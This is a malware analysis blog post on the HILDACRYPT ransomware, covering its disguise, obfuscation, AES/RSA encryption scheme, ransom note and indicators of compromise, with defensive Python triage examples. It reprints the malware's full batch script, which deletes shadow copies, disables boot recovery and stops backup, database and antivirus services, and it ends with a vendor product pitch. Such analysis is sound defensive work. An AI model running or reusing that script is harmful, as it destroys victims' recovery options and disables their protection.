HILDACRYPT: new ransomware hits backup systems and antivirus solutions

Hello, Habr! Once again we are looking at the latest malware samples in the Ransomware category. HILDACRYPT is a new ransomware strain, a member of the Hilda family discovered in August 2019 and named after the Netflix cartoon that was used to distribute the malware. Today we examine the technical features of this updated ransomware.

In the first version of the Hilda ransomware, the ransom note contained a link to the YouTube trailer of the cartoon series. HILDACRYPT disguises itself as a legitimate XAMPP installer, the easy-to-install Apache distribution that bundles MariaDB, PHP and Perl. However, the cryptolocker carries a different file name: xamp. In addition, the ransomware file has no digital signature.

Static analysis

The ransomware is a PE32 .NET executable built for MS Windows. Its size is 135 168 bytes. Both the main program code and the protection (obfuscation) code are written in C#. According to the compilation date and timestamp, the binary was built on September 14.

According to Detect It Easy, the ransomware is packed with Confuser and ConfuserEx, but these two detections describe the same thing: ConfuserEx is simply the successor of Confuser, so their code signatures are alike.

HILDACRYPT is indeed packed with ConfuserEx.

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Attack vector

Most likely, the ransomware was hosted on one of the web programming sites, disguised as a legitimate XAMPP package.

The whole infection chain can be observed in the app.any.run sandbox.

Obfuscation

The ransomware's strings are stored in encrypted form. At startup, HILDACRYPT decrypts them using Base64 and AES-256-CBC.

Installation

First, the ransomware creates a folder in %AppData%\Roaming whose name is a randomly generated GUID (globally unique identifier). After dropping a bat file into this location, the ransomware launches it via cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

It then runs the batch script in order to disable system features and services.

The script consists of a long list of commands that delete shadow copies and shut down SQL Server, backup and antivirus solutions.

For example, it tries (unsuccessfully) to stop the Acronis Backup services. It also targets the backup and antivirus products of the following vendors: Veeam, Sophos, Kaspersky, McAfee and others.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop "Sophos Device Control Service" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Zoolz 2 Service" /y
net stop McTaskManager /y
net stop "Sophos AutoUpdate Service" /y
net stop "Sophos System Protection Service" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Symantec System Recovery" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Sophos Health Service" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Sophos Message Router" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Sophos Clean Service" /y
net stop swi_update_64 /y
net stop "Sophos Web Control Service" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Veeam Backup Catalog Data Service" /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop "Sophos MCS Client" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop "SQLsafe Backup Service" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Sophos Safestore Service" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Sophos File Scanner Service" /y
net stop "Sophos Agent" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Enterprise Client Service" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "SQL Backups" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Sophos MCS Agent" /y
net stop RESvc /y
net stop "Acronis VSS Provider" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
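The batch script above is a compact defender's fingerprint: shadow-storage resizing, boot-recovery tampering and a long run of net stop calls against backup and antivirus services. The following added example (not code from the article or from Acronis) triages such a script with plain Python, classifying each line and naming the vendor families it targets; the vendor keyword table and the sample script lines are constructed from the names on this page.

```python
import re

# Constructed sample in the shape of the script shown above (not the full script).
SAMPLE_SCRIPT = """@echo off
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop "Sophos AutoUpdate Service" /y
net stop VeeamBackupSvc /y
net stop AcrSch2Svc /y
net stop MSSQLSERVER /y
net stop W3Svc /y
del %0
"""

# Service-name fragments mapped to the vendor families the article names (assumed table).
VENDOR_HINTS = {
    "acronis": ("acr", "acronis"),
    "veeam": ("veeam",),
    "sophos": ("sophos", "sav", "swi_"),
    "kaspersky": ("kav", "klnagent", "avp"),
    "mcafee": ("mcafee", "mfe", "mcshield", "mctaskmanager"),
    "sql": ("mssql", "sql"),
}

SHADOW_RE = re.compile(r"^\s*vssadmin\s+(resize\s+shadowstorage|delete\s+shadows)", re.I)
BCDEDIT_RE = re.compile(r"^\s*bcdedit\s+/set\s+\{default\}\s+(recoveryenabled|bootstatuspolicy)", re.I)
NETSTOP_RE = re.compile(r'^\s*net\s+stop\s+(?:"([^"]+)"|(\S+))', re.I)

def classify_line(line):
    """Return (category, detail) for a line of interest, or None otherwise."""
    if SHADOW_RE.match(line):
        return ("shadow_copy_tamper", line.strip())
    if BCDEDIT_RE.match(line):
        return ("recovery_disable", line.strip())
    m = NETSTOP_RE.match(line)
    if m:
        svc = m.group(1) or m.group(2)   # quoted or bare service name
        low = svc.lower()
        for vendor, hints in VENDOR_HINTS.items():
            if any(h in low for h in hints):
                return ("service_stop", f"{vendor}:{svc}")
        return ("service_stop", f"other:{svc}")
    return None

def triage_script(text):
    """Count hits per category and collect the vendor families targeted."""
    counts, vendors = {}, set()
    for line in text.splitlines():
        hit = classify_line(line)
        if hit is None:
            continue
        cat, detail = hit
        counts[cat] = counts.get(cat, 0) + 1
        if cat == "service_stop":
            vendors.add(detail.split(":", 1)[0])
    return counts, sorted(vendors)
```

Any script that combines all three categories, or stops services from more than one backup vendor, is worth an alert regardless of the family that dropped it.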

Once the services and processes listed above have been disabled, the cryptolocker collects information about all running processes with the tasklist command, to verify that every service it cares about is really down.
tasklist /v /fo csv

This command prints a detailed list of running processes whose fields are separated by the "," character:
"csrss.exe","448","services","0","1 896 КБ","unknown","Н/Д","0:00:03","Н/Д"

After this check, the ransomware starts the encryption process.

Encryption

File encryption

HILDACRYPT walks through everything it finds on the hard drives, except Recycle.Bin and the Reference Assemblies\Microsoft folder. The latter holds critical dll, pdb and similar files for .NET applications, and touching them could break the ransomware's own operation. To pick the files to encrypt, the following list of extensions is used:

".vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md"

The ransomware uses the AES-256-CBC algorithm to encrypt user files. The key size is 256 bits and the initialization vector (IV) is 16 bytes.

In the following screenshot, the values byte_2 and byte_1 are generated randomly with GetBytes().

Key

IV

An encrypted file gets the extension HCY!. Below is an example of an encrypted file; the key and IV shown above were generated for this particular file.

Key encryption

The cryptolocker stores the generated AES key inside the encrypted file. The beginning of the encrypted file carries a header with the fields HILDACRYPT, KEY, IV and FileLen in XML format, and it looks like this:

The AES key and the IV are encrypted with RSA-2048 and then Base64-encoded. The RSA public key is stored in the body of the cryptolocker as one of the encrypted strings, in XML format.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

The RSA public key is used to encrypt the per-file AES key. The public key is Base64-encoded and consists of a modulus and a public exponent of 65537. Decryption requires the RSA private key, which only the attacker holds.

After RSA encryption, the AES key is Base64-encoded and stored in the encrypted file.
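Two checks follow directly from the key-handling scheme described in this section, and the added example below (not code from the article or from Acronis) implements them in Python: parsing the XML public key to confirm a 2048-bit modulus with exponent 65537, and checking that the KEY and IV blobs in a file header are exactly 256 bytes, the only length an RSA-2048 ciphertext can have. The XML uses the RSAKeyValue element that .NET's RSA.ToXmlString produces (Base64 modulus, exponent "AQAB" = 65537); the header nesting, the placeholder modulus and the sample blobs are constructed assumptions, since the page names the header fields but not their exact layout.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample of a .NET RSAKeyValue public key. The modulus is a
# 256-byte placeholder, not a real key; a sample's own XML string would be
# passed to parse_rsakeyvalue() instead.
_PLACEHOLDER_MODULUS = ((1 << 2047) | 0xC0FFEE).to_bytes(256, "big")
SAMPLE_RSAKEYVALUE = (
    "<RSAKeyValue><Modulus>%s</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
    % base64.b64encode(_PLACEHOLDER_MODULUS).decode()
)

# Constructed sample of the per-file header. The field names come from the
# article; this nesting is an assumption. KEY and IV hold Base64 of the
# RSA-2048 ciphertexts, which are always 256 bytes long.
SAMPLE_HEADER = (
    "<HILDACRYPT><KEY>%s</KEY><IV>%s</IV><FileLen>4096</FileLen></HILDACRYPT>"
    % (base64.b64encode(b"\x01" * 256).decode(),
       base64.b64encode(b"\x02" * 256).decode())
)

def parse_rsakeyvalue(xml_text):
    """Return (modulus_bits, exponent) from a .NET RSAKeyValue public key."""
    root = ET.fromstring(xml_text)
    if root.tag != "RSAKeyValue":
        raise ValueError("not an RSAKeyValue element")
    n = int.from_bytes(base64.b64decode(root.findtext("Modulus")), "big")
    e = int.from_bytes(base64.b64decode(root.findtext("Exponent")), "big")
    return n.bit_length(), e

def triage_header(xml_text):
    """Decode the header fields and check them against the scheme on the page.

    A KEY or IV blob that is not exactly 256 bytes cannot be an RSA-2048
    ciphertext, so the file is either truncated or not from this scheme."""
    root = ET.fromstring(xml_text)
    key_ct = base64.b64decode(root.findtext("KEY"))
    iv_ct = base64.b64decode(root.findtext("IV"))
    file_len = int(root.findtext("FileLen"))
    return {
        "key_ct_len": len(key_ct),
        "iv_ct_len": len(iv_ct),
        "file_len": file_len,
        "rsa2048_consistent": len(key_ct) == 256 and len(iv_ct) == 256,
    }
```

Recovering the original AES key from these 256-byte blobs requires the matching RSA private key; the header only tells an analyst that the scheme was applied and how long the plaintext was.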

Ransom note

When encryption finishes, HILDACRYPT writes an html file into the folder whose files it has encrypted. The ransom note contains two email addresses through which the victim can contact the attacker.

The ransom note also contains the line "No loli is safe ;)", a reference to the anime and manga characters drawn as little girls, which are banned in Japan.

Conclusion

HILDACRYPT, a new ransomware family, has released a new version. Its encryption scheme prevents the victim from decrypting the files the ransomware has encrypted. The cryptolocker uses active defence-evasion techniques to shut down the protection services that belong to backup systems and antivirus solutions. The author of HILDACRYPT is a fan of the animated series Hilda shown on Netflix; a link to its trailer was included in the ransom note of the previous version of the program.

As usual, Acronis Backup and Acronis True Image can protect your computer from the HILDACRYPT ransomware, and service providers can protect their customers with Acronis Backup Cloud. Protection is ensured by the fact that these solutions combine cyber security with backup: they include not only the backup itself, but also our integrated security system, Acronis Active Protection, which runs a machine-learning model built on behavioural heuristics, a technology capable of stopping zero-day ransomware threats like no other.

Indicators of compromise

File extension HCY!
HILDACRYPTReadMe.html
xamp.exe, with a single letter "p" and no digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Source: www.habr.com